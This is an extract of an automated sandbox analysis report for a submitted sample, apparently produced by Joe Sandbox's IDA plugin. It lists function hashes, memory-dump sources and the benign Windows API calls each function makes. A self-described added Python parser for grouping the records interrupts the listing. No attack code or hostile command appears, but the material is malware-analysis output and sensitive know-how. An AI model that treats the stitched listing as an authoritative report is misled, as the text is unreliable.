• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
• Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
• Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
• Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
APIs
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4023252218-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1489400265-0
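The function records above are easier to triage as structured data than as a listing: the same call sites (0045564E, 0045565C, 0045566A, 00455678) appear in more than one record, which tells you the snapshots cover overlapping code rather than distinct functions. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; it assumes the record layout seen in this listing (a record starts at the "• Opcode ID:" line, API calls follow the "APIs" heading as "Name.MODULE(args), ref: ADDR", and "Similarity" carries the API ID and API String ID). The SAMPLE text is constructed from the three complete records above with the fields the parser does not read left out.

```python
import re
from itertools import combinations

# Constructed input: the three complete records from the listing, reduced to
# the lines this parser consumes. Addresses, API names and IDs are the page's.
SAMPLE = """\
• Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
• Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
APIs
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460342
• GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
• MessageBeep.USER32(00000000), ref: 0046036D
• KillTimer.USER32(?,0000040A), ref: 00460392
• EndDialog.USER32(?,00000001), ref: 004603AB
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• API String ID: 3741023627-0
• Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• API String ID: 1489400265-0
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix, then
# Name.MODULE(args), ref: ADDR. Assumed from the listing's own line shape.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$"
)


def parse_records(text):
    """Split the listing into records keyed on the '• Opcode ID:' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• Opcode ID:"):
            cur = {"opcode_id": line.split(":", 1)[1].strip(),
                   "calls": [], "api_id": None, "api_string_id": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["calls"].append({"api": m["api"], "module": m["mod"],
                                 "args": m["args"].split(","),
                                 "ref": int(m["ref"], 16),
                                 "subcall": m["sub"]})
        elif line.startswith("• API String ID:"):
            cur["api_string_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
    return records


def api_sequence(rec):
    """Direct imports called by the record, in call-site order (subcalls excluded)."""
    return [c["api"] for c in rec["calls"] if c["subcall"] is None]


def call_site_span(rec):
    """Lowest and highest direct call-site address: a rough extent of the function."""
    refs = [c["ref"] for c in rec["calls"] if c["subcall"] is None]
    return (min(refs), max(refs)) if refs else None


def find_shared_call_sites(records):
    """Pairs of records whose direct call sites coincide, i.e. overlapping snapshots."""
    out = []
    for a, b in combinations(records, 2):
        shared = ({c["ref"] for c in a["calls"] if c["subcall"] is None}
                  & {c["ref"] for c in b["calls"] if c["subcall"] is None})
        if shared:
            out.append((a["opcode_id"][:12], b["opcode_id"][:12],
                        sorted(f"{r:08X}" for r in shared)))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        lo, hi = call_site_span(r)
        print(f"{r['opcode_id'][:12]} {lo:08X}-{hi:08X} {r['api_string_id']} "
              f"{' > '.join(api_sequence(r))}")
    for a, b, shared in find_shared_call_sites(recs):
        print(f"overlap {a} / {b}: {', '.join(shared)}")
```

Overlap by call-site address is the useful signal here: two records with different Opcode IDs and different API String IDs can still be views of the same cleanup routine, and collapsing them before comparing against other samples avoids counting one function several times.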
• Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
• Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
• Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
• Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
• Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
• Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
• Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 132634196-0
• Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
• Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                                                                                                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3798957060-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1537469427-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
• Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
• Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
• Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
• Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _memcmp
• String ID: '$[$h
• API String ID: 2931989736-1224472061
• Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
• Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _strncmp
• String ID: >$R$U
• API String ID: 909875538-1924298640
• Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
• Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
APIs
  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
• CoInitialize.OLE32(00000000), ref: 0046CE18
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
• CoUninitialize.OLE32 ref: 0046CE50
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
